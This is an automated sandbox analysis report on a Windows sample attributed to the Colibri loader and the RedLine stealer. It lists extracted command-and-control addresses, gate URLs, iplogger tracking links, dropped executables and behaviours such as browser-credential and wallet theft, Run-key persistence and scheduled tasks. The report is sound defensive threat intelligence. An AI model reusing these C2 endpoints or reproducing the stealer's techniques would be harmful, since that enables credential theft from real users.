colibri | 8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02b8ba8e65e1081c054cb

Analysis

max time kernel
195s
max time network
199s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2022 20:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
Size

1.4MB
MD5

3b60e55817d1e61d5b98df195efd79d0
SHA1

d61730ba4c43d35de9a5bc13bdabbd0c0a1f4164
SHA256

8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02b8ba8e65e1081c054cb
SHA512

b73e3b2c1d749a7729a9ddab9d77ec57454423d759bea312179dc6d4e62852c0721ba9956da985e7b670bd0d22a1f1bbc353ec739866ff29098bb36f55be46b5

Score

10^/10

colibri redline 4 @tag12312341 build1 https://t.me/insttailer nam3 discovery infostealer loader persistence spyware stealer

Malware Config

Extracted

Family

redline

Botnet

nam3

103.89.90.61:18728

Attributes

auth_value
64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

31.41.244.134:11643

Attributes

auth_value
a516b2d034ecd34338f12b50347fbd92

Extracted

Family

redline

Botnet

@tag12312341

62.204.41.144:14096

Attributes

auth_value
71466795417275fac01979e57016e277

Extracted

Family

redline

Botnet

https://t.me/insttailer

185.199.224.90:37143

Attributes

auth_value
1e73e022970e3ad55c62cb5010e7599b

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 13 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
behavioral2/memory/4496-166-0x0000000000920000-0x0000000000964000-memory.dmp	family_redline
behavioral2/memory/1808-178-0x0000000000670000-0x00000000006B4000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
behavioral2/memory/1276-183-0x0000000000370000-0x0000000000390000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	family_redline
behavioral2/memory/5760-247-0x0000000000820000-0x0000000000850000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline

Downloads MZ/PE file

Executes dropped EXE 18 IoCs

Processes:

real.exeF0geI.exenamdoitntn.exeromb_ro.exesafert44.exetag.exekukurzka9000.exepigmo.exeffnameedit.exenamdoitntn.exeEU1.exebbc.exeiog.execonhost.exesvchost.exeGet-Variable.exeMoUSO.exeGet-Variable.exe

pid	process
2144	real.exe
3444	F0geI.exe
4496	namdoitntn.exe
4028	romb_ro.exe
1808	safert44.exe
1276	tag.exe
3936	kukurzka9000.exe
5604	pigmo.exe
5760	ffnameedit.exe
5220	namdoitntn.exe
6016	EU1.exe
5792	bbc.exe
1688	iog.exe
5528	conhost.exe
5952	svchost.exe
76008	Get-Variable.exe
4212	MoUSO.exe
1260	Get-Variable.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.execonhost.exeGet-Variable.exeGet-Variable.exeEU1.exe8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exetag.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Get-Variable.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Get-Variable.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	EU1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	tag.exe

Loads dropped DLL 5 IoCs

Processes:

pigmo.exeRundll32.exeRundll32.exe

pid process

5604 pigmo.exe
5604 pigmo.exe
5604 pigmo.exe
3876 Rundll32.exe
4808 Rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

bbc.exe

description pid process target process

PID 5792 set thread context of 157240 5792 bbc.exe AppLaunch.exe

pid	process
5604	pigmo.exe
5604	pigmo.exe
5604	pigmo.exe
3876	Rundll32.exe
4808	Rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

description	pid	process	target process
PID 5792 set thread context of 157240	5792	bbc.exe	AppLaunch.exe

Drops file in Program Files directory 12 IoCs

Processes:

8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exesetup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\EU1.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\35c576e9-a8c8-4c1b-851e-e27a0830c8c9.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\F0geI.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\romb_ro.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\safert44.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\tag.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220725224029.pma	setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\real.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\pigmo.exe	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

5752 3444 WerFault.exe F0geI.exe
3008 4028 WerFault.exe romb_ro.exe
5432 2144 WerFault.exe real.exe

pid	pid_target	process	target process
5752	3444	WerFault.exe	F0geI.exe
3008	4028	WerFault.exe	romb_ro.exe
5432	2144	WerFault.exe	real.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\pigmo.exe	nsis_installer_1
C:\Program Files (x86)\Company\NewProduct\pigmo.exe	nsis_installer_2
C:\Program Files (x86)\Company\NewProduct\pigmo.exe	nsis_installer_1
C:\Program Files (x86)\Company\NewProduct\pigmo.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

romb_ro.exereal.exeEU1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	romb_ro.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	romb_ro.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	real.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	real.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	EU1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EU1.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

28668 schtasks.exe
75908 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6168 timeout.exe

pid	process
28668	schtasks.exe
75908	schtasks.exe

pid	process
6168	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5724 taskkill.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

pid	process
5724	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeromb_ro.exeffnameedit.exesafert44.exetag.exenamdoitntn.exenamdoitntn.exereal.exeidentity_helper.exeEU1.exepowershell.exeMoUSO.exe

pid	process
5196	msedge.exe
5196	msedge.exe
5224	msedge.exe
5224	msedge.exe
5492	msedge.exe
5492	msedge.exe
5292	msedge.exe
5292	msedge.exe
5508	msedge.exe
5508	msedge.exe
5284	msedge.exe
5284	msedge.exe
5500	msedge.exe
5500	msedge.exe
2292	msedge.exe
2292	msedge.exe
4028	romb_ro.exe
4028	romb_ro.exe
5760	ffnameedit.exe
5760	ffnameedit.exe
1808	safert44.exe
1808	safert44.exe
1276	tag.exe
1276	tag.exe
4496	namdoitntn.exe
4496	namdoitntn.exe
5220	namdoitntn.exe
5220	namdoitntn.exe
2144	real.exe
2144	real.exe
1340	identity_helper.exe
1340	identity_helper.exe
6016	EU1.exe
6016	EU1.exe
372	powershell.exe
372	powershell.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
372	powershell.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe
4212	MoUSO.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

Processes:

msedge.exe

pid	process
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

ffnameedit.exesafert44.exetag.exenamdoitntn.exenamdoitntn.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	5760	ffnameedit.exe
Token: SeDebugPrivilege	1808	safert44.exe
Token: SeDebugPrivilege	1276	tag.exe
Token: SeDebugPrivilege	4496	namdoitntn.exe
Token: SeDebugPrivilege	5220	namdoitntn.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	5724	taskkill.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msedge.exe

pid process

2292 msedge.exe
2292 msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	pid	process	target process
PID 2792 wrote to memory of 5088	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 5088	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 4924	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 4924	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 4620	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 4620	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 5088 wrote to memory of 5084	5088	msedge.exe	msedge.exe
PID 5088 wrote to memory of 5084	5088	msedge.exe	msedge.exe
PID 4620 wrote to memory of 3348	4620	msedge.exe	msedge.exe
PID 4620 wrote to memory of 3348	4620	msedge.exe	msedge.exe
PID 4924 wrote to memory of 3268	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 3268	4924	msedge.exe	msedge.exe
PID 2792 wrote to memory of 2020	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 2020	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2020 wrote to memory of 1188	2020	msedge.exe	msedge.exe
PID 2020 wrote to memory of 1188	2020	msedge.exe	msedge.exe
PID 2792 wrote to memory of 4760	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 4760	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 2328	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 2328	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 4760 wrote to memory of 1072	4760	msedge.exe	msedge.exe
PID 4760 wrote to memory of 1072	4760	msedge.exe	msedge.exe
PID 2792 wrote to memory of 2292	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 2292	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2328 wrote to memory of 1624	2328	msedge.exe	msedge.exe
PID 2328 wrote to memory of 1624	2328	msedge.exe	msedge.exe
PID 2292 wrote to memory of 1740	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 1740	2292	msedge.exe	msedge.exe
PID 2792 wrote to memory of 3572	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 2792 wrote to memory of 3572	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	msedge.exe
PID 3572 wrote to memory of 1124	3572	msedge.exe	msedge.exe
PID 3572 wrote to memory of 1124	3572	msedge.exe	msedge.exe
PID 2792 wrote to memory of 2144	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	real.exe
PID 2792 wrote to memory of 2144	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	real.exe
PID 2792 wrote to memory of 2144	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	real.exe
PID 2792 wrote to memory of 3444	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	F0geI.exe
PID 2792 wrote to memory of 3444	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	F0geI.exe
PID 2792 wrote to memory of 3444	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	F0geI.exe
PID 2792 wrote to memory of 4496	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	namdoitntn.exe
PID 2792 wrote to memory of 4496	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	namdoitntn.exe
PID 2792 wrote to memory of 4496	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	namdoitntn.exe
PID 2792 wrote to memory of 4028	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	romb_ro.exe
PID 2792 wrote to memory of 4028	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	romb_ro.exe
PID 2792 wrote to memory of 4028	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	romb_ro.exe
PID 2792 wrote to memory of 1808	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	safert44.exe
PID 2792 wrote to memory of 1808	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	safert44.exe
PID 2792 wrote to memory of 1808	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	safert44.exe
PID 2792 wrote to memory of 1276	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	tag.exe
PID 2792 wrote to memory of 1276	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	tag.exe
PID 2792 wrote to memory of 1276	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	tag.exe
PID 2792 wrote to memory of 3936	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	kukurzka9000.exe
PID 2792 wrote to memory of 3936	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	kukurzka9000.exe
PID 2792 wrote to memory of 3936	2792	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	kukurzka9000.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 4728	2292	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe
"C:\Users\Admin\AppData\Local\Temp\8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1n7LH4
2⤵
- Suspicious use of WriteProcessMemory
PID:5088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2824000357814231746,12329959520470491734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
3⤵
PID:5140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,2824000357814231746,12329959520470491734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK4
2⤵
- Suspicious use of WriteProcessMemory
PID:4924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xb0,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:3268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6934335979038752460,4577335409360523466,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
3⤵
PID:5152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,6934335979038752460,4577335409360523466,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RLtX4
2⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:3348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1816,6255504633810059021,11726635324609164258,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1816,6255504633810059021,11726635324609164258,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
3⤵
PID:4396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX4
2⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd549f46f8,0x7ffd549f4708,0x7ffd549f4718
3⤵
PID:1188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
